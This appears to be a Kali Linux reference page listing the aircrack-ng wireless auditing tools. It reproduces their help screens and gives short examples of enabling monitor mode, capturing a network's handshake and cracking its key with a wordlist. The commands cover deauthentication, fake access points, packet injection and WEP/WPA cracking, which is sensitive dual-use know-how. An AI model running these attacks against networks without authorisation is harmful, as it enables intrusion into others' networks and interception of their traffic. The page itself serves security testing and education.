Tools included in the aircrack-ng package
airbase-ng – Configure fake access points
root@kali:~# airbase-ng --help
Airbase-ng 1.2 beta3 - (C) 2008-2013 Thomas d'Otreppe
Original work: Martin Beck
http://www.aircrack-ng.org
usage: airbase-ng <options> <replay interface>
Options:
-a bssid : set Access Point MAC address
-i iface : capture packets from this interface
-w WEP key : use this WEP key to en-/decrypt packets
-h MAC : source mac for MITM mode
-f disallow : disallow specified client MACs (default: allow)
-W 0|1 : [don't] set WEP flag in beacons 0|1 (default: auto)
-q : quiet (do not print statistics)
-v : verbose (print more messages)
-A : Ad-Hoc Mode (allows other clients to peer)
-Y in|out|both : external packet processing
-c channel : sets the channel the AP is running on
-X : hidden ESSID
-s : force shared key authentication (default: auto)
-S : set shared key challenge length (default: 128)
-L : Caffe-Latte WEP attack (use if driver can't send frags)
-N : cfrag WEP attack (recommended)
-x nbpps : number of packets per second (default: 100)
-y : disables responses to broadcast probes
-0 : set all WPA,WEP,open tags. can't be used with -z & -Z
-z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
-Z type : same as -z, but for WPA2
-V type : fake EAPOL 1=MD5 2=SHA1 3=auto
-F prefix : write all sent and received frames into pcap file
-P : respond to all probes, even when specifying ESSIDs
-I interval : sets the beacon interval value in ms
-C seconds : enables beaconing of probed ESSID values (requires -P)
Filter options:
--bssid MAC : BSSID to filter/use
--bssids file : read a list of BSSIDs out of that file
--client MAC : MAC of client to filter
--clients file : read a list of MACs out of that file
--essid ESSID : specify a single ESSID (default: default)
--essids file : read a list of ESSIDs out of that file
--help : Displays this usage screen
aircrack-ng – Wireless password cracker
root@kali:~# aircrack-ng --help
Aircrack-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
http://www.aircrack-ng.org
usage: aircrack-ng [options] <.cap / .ivs file(s)>
Common options:
-a <amode> : force attack mode (1/WEP, 2/WPA-PSK)
-e <essid> : target selection: network identifier
-b <bssid> : target selection: access point's MAC
-p <nbcpu> : # of CPU to use (default: all CPUs)
-q : enable quiet mode (no status output)
-C <macs> : merge the given APs to a virtual one
-l <file> : write key to file
Static WEP cracking options:
-c : search alpha-numeric characters only
-t : search binary coded decimal chr only
-h : search the numeric key for Fritz!BOX
-d <mask> : use masking of the key (A1:XX:CF:YY)
-m <maddr> : MAC address to filter usable packets
-n <nbits> : WEP key length : 64/128/152/256/512
-i <index> : WEP key index (1 to 4), default: any
-f <fudge> : bruteforce fudge factor, default: 2
-k <korek> : disable one attack method (1 to 17)
-x or -x0 : disable bruteforce for last keybytes
-x1 : last keybyte bruteforcing (default)
-x2 : enable last 2 keybytes bruteforcing
-X : disable bruteforce multithreading
-y : experimental single bruteforce mode
-K : use only old KoreK attacks (pre-PTW)
-s : show the key in ASCII while cracking
-M <num> : specify maximum number of IVs to use
-D : WEP decloak, skips broken keystreams
-P <num> : PTW debug: 1: disable Klein, 2: PTW
-1 : run only 1 try to crack key with PTW
WEP and WPA-PSK cracking options:
-w <words> : path to wordlist(s) filename(s)
WPA-PSK options:
-E <file> : create EWSA Project file v3
-J <file> : create Hashcat Capture file
-S : WPA cracking speed test
Other options:
-u : Displays # of CPUs & MMX/SSE support
--help : Displays this usage screen
airdecap-ng – Decrypt WEP/WPA/WPA2 capture files
root@kali:~# airdecap-ng --help
Airdecap-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
http://www.aircrack-ng.org
usage: airdecap-ng [options] <pcap file>
Common options:
-l : don't remove the 802.11 header
-b <bssid> : access point MAC address filter
-e <essid> : target network SSID
WEP specific option:
-w <key> : target network WEP key in hex
WPA specific options:
-p <pass> : target network WPA passphrase
-k <pmk> : WPA Pairwise Master Key in hex
--help : Displays this usage screen
airdecloak-ng – Removes wep cloaking from a pcap file
root@kali:~# airdecloak-ng --help
Airdecloak-ng 1.2 beta3 - (C) 2008-2013 Thomas d'Otreppe
http://www.aircrack-ng.org
usage: airdecloak-ng [options]
options:
Mandatory:
-i <file> : Input capture file
--ssid <ESSID> : ESSID of the network to filter
or
--bssid <BSSID> : BSSID of the network to filter
Optional:
--filters <filters> : Apply filters (separated by a comma). Filters:
signal: Try to filter based on signal.
duplicate_sn: Remove all duplicate sequence numbers
for both the AP and the client.
duplicate_sn_ap: Remove duplicate sequence number for
the AP only.
duplicate_sn_client: Remove duplicate sequence number for the
client only.
consecutive_sn: Filter based on the fact that IV should
be consecutive (only for AP).
duplicate_iv: Remove all duplicate IV.
signal_dup_consec_sn: Use signal (if available), duplicate and
consecutive sequence number (filtering is
much more precise than using all these
filters one by one).
--null-packets : Assume that null packets can be cloaked.
--disable-base_filter : Do not apply base filter.
--drop-frag : Drop fragmented packets
--help : Displays this usage screen
airdriver-ng – Provides status information about the wireless drivers on your system
root@kali:~# airdriver-ng --help
Found kernel: 3.3.12-kali1-686-pae.3.12-kali1-686-pae
usage: airdriver-ng <command> [drivernumber]
valid commands:
supported - lists all supported drivers
kernel - lists all in-kernel drivers
installed - lists all installed drivers
loaded - lists all loaded drivers
-----------------------------------------------------
insert <drivernum> - inserts a driver
load <drivernum> - loads a driver
unload <drivernum> - unloads a driver
reload <drivernum> - reloads a driver
-----------------------------------------------------
compile <drivernum> - compiles a driver
install <drivernum> - installs a driver
remove <drivernum> - removes a driver
-----------------------------------------------------
compile_stack <stacknum> - compiles a stack
install_stack <stacknum> - installs a stack
remove_stack <stacknum> - removes a stack
-----------------------------------------------------
install_firmware <drivernum> - installs the firmware
remove_firmware <drivernum> - removes the firmware
-----------------------------------------------------
details <drivernum> - prints driver details
detect - detects wireless cards
aireplay-ng – Primary function is to generate traffic for the later use in aircrack-ng
root@kali:~# aireplay-ng --help
Aireplay-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
http://www.aircrack-ng.org
usage: aireplay-ng <options> <replay interface>
Filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
-D : disable AP detection
Replay options:
-x nbpps : number of packets per second
-p fctrl : set frame control word (hex)
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-g value : change ring buffer size (default: 8)
-F : choose first matching packet
Fakeauth attack options:
-e essid : set target AP SSID
-o npckts : number of packets per burst (0=auto, default: 1)
-q sec : seconds between keep-alives
-Q : send reassociation requests
-y prga : keystream for shared key auth
-T n : exit after retry fake auth request n time
Arp Replay attack options:
-j : inject FromDS packets
Fragmentation attack options:
-k IP : set destination IP in fragments
-l IP : set source IP in fragments
Test attack options:
-B : activates the bitrate test
Source options:
-i iface : capture packets from this interface
-r file : extract packets from this pcap file
Miscellaneous options:
-R : disable /dev/rtc usage
--ignore-negative-one : if the interface's channel can't be determined,
ignore the mismatch, needed for unpatched cfg80211
Attack modes (numbers can still be used):
--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--caffe-latte : query a client for new IVs (-6)
--cfrag : fragments against a client (-7)
--migmode : attacks WPA migration mode (-8)
--test : tests injection and quality (-9)
--help : Displays this usage screen
airmon-ng – This script can be used to enable monitor mode on wireless interfaces
root@kali:~# airmon-ng --help
usage: airmon-ng <start|stop|check> <interface> [channel or frequency]
airmon-zc – This script can be used to enable monitor mode on wireless interfaces
root@kali:~# airmon-zc --help
usage: airmon-zc <start|stop|check> <interface> [channel or frequency]
airodump-ng – Used for packet capturing of raw 802.11 frames
root@kali:~# airodump-ng --help
Airodump-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
http://www.aircrack-ng.org
usage: airodump-ng <options> <interface>[,<interface>,...]
Options:
--ivs : Save only captured IVs
--gpsd : Use GPSd
--write <prefix> : Dump file prefix
-w : same as --write
--beacons : Record all beacons in dump file
--update <secs> : Display update delay in seconds
--showack : Prints ack/cts/rts statistics
-h : Hides known stations for --showack
-f <msecs> : Time in ms between hopping channels
--berlin <secs> : Time before removing the AP/client
from the screen when no more packets
are received (Default: 120 seconds)
-r <file> : Read packets from that file
-x <msecs> : Active Scanning Simulation
--manufacturer : Display manufacturer from IEEE OUI list
--uptime : Display AP Uptime from Beacon Timestamp
--output-format
<formats> : Output format. Possible values:
pcap, ivs, csv, gps, kismet, netxml
--ignore-negative-one : Removes the message that says
fixed channel <interface>: -1
Filter options:
--encrypt <suite> : Filter APs by cipher suite
--netmask <netmask> : Filter APs by mask
--bssid <bssid> : Filter APs by BSSID
--essid <essid> : Filter APs by ESSID
-a : Filter unassociated clients
By default, airodump-ng hop on 2.4GHz channels.
You can make it capture on other/specific channel(s) by using:
--channel <channels> : Capture on specific channels
--band <abg> : Band on which airodump-ng should hop
-C <frequencies> : Uses these frequencies in MHz to hop
--cswitch <method> : Set channel switching method
0 : FIFO (default)
1 : Round Robin
2 : Hop on last
-s : same as --cswitch
--help : Displays this usage screen
airodump-ng-oui-update – Downloads and parses IEEE OUI list
airodump-ng-oui-updater downloads and parses IEEE OUI list.
airolib-ng – Designed to store and manage essid and password lists
root@kali:~# airolib-ng --help
Airolib-ng 1.2 beta3 - (C) 2007, 2008, 2009 ebfe
http://www.aircrack-ng.org
Usage: airolib-ng <database> <operation> [options]
Operations:
--stats : Output information about the database.
--sql <sql> : Execute specified SQL statement.
--clean [all] : Clean the database from old junk. 'all' will also
reduce filesize if possible and run an integrity check.
--batch : Start batch-processing all combinations of ESSIDs
and passwords.
--verify [all] : Verify a set of randomly chosen PMKs.
If 'all' is given, all invalid PMK will be deleted.
--import [essid|passwd] <file> :
Import a text file as a list of ESSIDs or passwords.
--import cowpatty <file> :
Import a cowpatty file.
--export cowpatty <essid> <file> :
Export to a cowpatty file.
airserv-ng – A wireless card server
root@kali:~# airserv-ng --help
airserv-ng: invalid option -- '-'
Airserv-ng 1.2 beta3 - (C) 2007, 2008, 2009 Andrea Bittau
http://www.aircrack-ng.org
Usage: airserv-ng <options>
Options:
-h : This help screen
-p <port> : TCP port to listen on (default:666)
-d <iface> : Wifi interface to use
-c <chan> : Channel to use
-v <level> : Debug level (1 to 3; default: 1)
airtun-ng – Virtual tunnel interface creator
root@kali:~# airtun-ng --help
Airtun-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
Original work: Martin Beck
http://www.aircrack-ng.org
usage: airtun-ng <options> <replay interface>
-x nbpps : number of packets per second (default: 100)
-a bssid : set Access Point MAC address
: In WDS Mode this sets the Receiver
-i iface : capture packets from this interface
-y file : read PRGA from this file
-w wepkey : use this WEP-KEY to encrypt packets
-t tods : send frames to AP (1) or to client (0)
: or tunnel them into a WDS/Bridge (2)
-r file : read frames out of pcap file
WDS/Bridge Mode options:
-s transmitter : set Transmitter MAC address for WDS Mode
-b : bidirectional mode. This enables communication
: in Transmitter's AND Receiver's networks.
: Works only if you can see both stations.
Repeater options:
--repeat : activates repeat mode
--bssid <mac> : BSSID to repeat
--netmask <mask> : netmask for BSSID filter
--help : Displays this usage screen
besside-ng – Automatically crack WEP & WPA network
root@kali:~# besside-ng --help
besside-ng: invalid option -- '-'
Besside-ng 1.2 beta3 - (C) 2010 Andrea Bittau
http://www.aircrack-ng.org
Usage: besside-ng [options] <interface>
Options:
-b <victim mac> : Victim BSSID
-s <WPA server> : Upload wpa.cap for cracking
-c <chan> : chanlock
-p <pps> : flood rate
-W : WPA only
-v : verbose, -vv for more, etc.
-h : This help screen
buddy-ng
root@kali:~# buddy-ng -h
Buddy-ng 1.2 beta3 - (C) 2007,2008 Andrea Bittau
http://www.aircrack-ng.org
Usage: buddy-ng <options>
Options:
-h : This help screen
-p : Don't drop privileges
easside-ng – An auto-magic tool which allows you to communicate via an WEP-encrypted access point
root@kali:~# easside-ng -h
Easside-ng 1.2 beta3 - (C) 2007, 2008, 2009 Andrea Bittau
http://www.aircrack-ng.org
Usage: easside-ng <options>
Options:
-h : This help screen
-v <victim mac> : Victim BSSID
-m <src mac> : Source MAC address
-i <ip> : Source IP address
-r <router ip> : Router IP address
-s <buddy ip> : Buddy-ng IP address (mandatory)
-f <iface> : Interface to use (mandatory)
-c <channel> : Lock card to this channel
-n : Determine Internet IP only
ivstools – This tool handle .ivs files. You can either merge or convert them.
root@kali:~# ivstools
ivsTools 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
http://www.aircrack-ng.org
usage: ivstools --convert <pcap file> <ivs output file>
Extract ivs from a pcap file
ivstools --merge <ivs file 1> <ivs file 2> .. <output file>
Merge ivs files
kstats
root@kali:~# kstats
usage: kstats <ivs file> <104-bit key>
makeivs-ng – Generates initialization vectors
root@kali:~# makeivs-ng --help
makeivs-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
http://www.aircrack-ng.org
usage: makeivs-ng [options]
Common options:
-b <bssid> : Set access point MAC address
-f <num> : Number of first IV
-k <key> : Target network WEP key in hex
-s <num> : Seed used to setup random generator
-w <file> : Filename to write IVs into
-c <num> : Number of IVs to generate
-d <num> : Percentage of dupe IVs
-e <num> : Percentage of erroneous keystreams
-l <num> : Length of keystreams
-n : Ignores ignores weak IVs
-p : Uses prng algorithm to generate IVs
--help : Displays this usage screen
packetforge-ng – Create encrypted packets that can subsequently be used for injection
root@kali:~# packetforge-ng --help
Packetforge-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
Original work: Martin Beck
http://www.aircrack-ng.org
Usage: packetforge-ng <mode> <options>
Forge options:
-p <fctrl> : set frame control word (hex)
-a <bssid> : set Access Point MAC address
-c <dmac> : set Destination MAC address
-h <smac> : set Source MAC address
-j : set FromDS bit
-o : clear ToDS bit
-e : disables WEP encryption
-k <ip[:port]> : set Destination IP [Port]
-l <ip[:port]> : set Source IP [Port]
-t ttl : set Time To Live
-w <file> : write packet to this pcap file
-s <size> : specify size of null packet
-n <packets> : set number of packets to generate
Source options:
-r <file> : read packet from this raw file
-y <file> : read PRGA from this file
Modes:
--arp : forge an ARP packet (-0)
--udp : forge an UDP packet (-1)
--icmp : forge an ICMP packet (-2)
--null : build a null packet (-3)
--custom : build a custom packet (-9)
--help : Displays this usage screen
tkiptun-ng – This tool is able to inject a few frames into a WPA TKIP network with QoS
root@kali:~# tkiptun-ng --help
Tkiptun-ng 1.2 beta3 - (C) 2008-2013 Thomas d'Otreppe
http://www.aircrack-ng.org
usage: tkiptun-ng <options> <replay interface>
Filter options:
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length (default: 80)
-n len : maximum packet length (default: 80)
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-D : disable AP detection
-Z : select packets manually
Replay options:
-x nbpps : number of packets per second
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-e essid : set target AP SSID
-M sec : MIC error timout in seconds [60]
Debug options:
-K prga : keystream for continuation
-y file : keystream-file for continuation
-j : inject FromDS packets
-P pmk : pmk for verification/vuln testing
-p psk : psk to calculate pmk with essid
source options:
-i iface : capture packets from this interface
-r file : extract packets from this pcap file
--help : Displays this usage screen
wesside-ng – Auto-magic tool which incorporates a number of techniques to seamlessly obtain a WEP key
root@kali:~# wesside-ng -h
Wesside-ng 1.2 beta3 - (C) 2007, 2008, 2009 Andrea Bittau
http://www.aircrack-ng.org
Usage: wesside-ng <options>
Options:
-h : This help screen
-i <iface> : Interface to use (mandatory)
-m <my ip> : My IP address
-n <net ip> : Network IP address
-a <mymac> : Source MAC Address
-c : Do not crack the key
-p <min prga> : Minimum bytes of PRGA to gather
-v <victim mac> : Victim BSSID
-t <threshold> : Cracking threshold
-f <max chan> : Highest scanned chan (default: 11)
-k <txnum> : Ignore acks and tx txnum times
wpaclean – Remove excess data from a pcap file
root@kali:~# wpaclean
Usage: wpaclean <out.cap> <in.cap> [in2.cap] [...]
airdriver-ng Usage Example
root@kali:~# airdriver-ng detect
USB devices (generic detection):
Bus 002 Device 009: ID 0846:9001 NetGear, Inc. WN111(v2) RangeMax Next Wireless [Atheros AR9170+AR9101]
Bus 001 Device 012: ID 050d:0017 Belkin Components B8T017 Bluetooth+EDR 2.1
Bus 001 Device 005: ID 0e0f:0008 VMware, Inc.
airmon-ng Usage Example
Start (start) monitor mode on the wireless interface (wlan0) on the desired channel (6):
root@kali:~# airmon-ng start wlan0 6
Interface Chipset Driver
wlan0 2-2: Atheros carl9170 - [phy4]
(monitor mode enabled on mon0)
airodump-ng Usage Example
Sniff on channel 6 (-c 6), filtering on a BSSID (–bssid 38:60:77:23:B1:CB), writing the capture to disk (-w capture), using the monitor mode interface (mon0):
root@kali:~# airodump-ng -c 6 --bssid 38:60:77:23:B1:CB -w capture mon0
CH 6 ][ Elapsed: 4 s ][ 2014-05-15 17:21
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
38:60:77:23:B1:CB -79 0 7 0 0 6 54e WPA2 CCMP PSK 6EA10E
BSSID STATION PWR Rate Lost Frames Probe
aircrack-ng Usage Example
Using the provided wordlist (-w /usr/share/wordlists/nmap.lst), attempt to crack passwords in the capture file (capture-01.cap):
root@kali:~# aircrack-ng -w /usr/share/wordlists/nmap.lst capture-01.cap
Opening capture-01.cap
Read 2 packets.
# BSSID ESSID Encryption
1 38:60:77:23:B1:CB 6EA10E No data - WEP or WPA
Choosing first network as target.
Opening capture-01.cap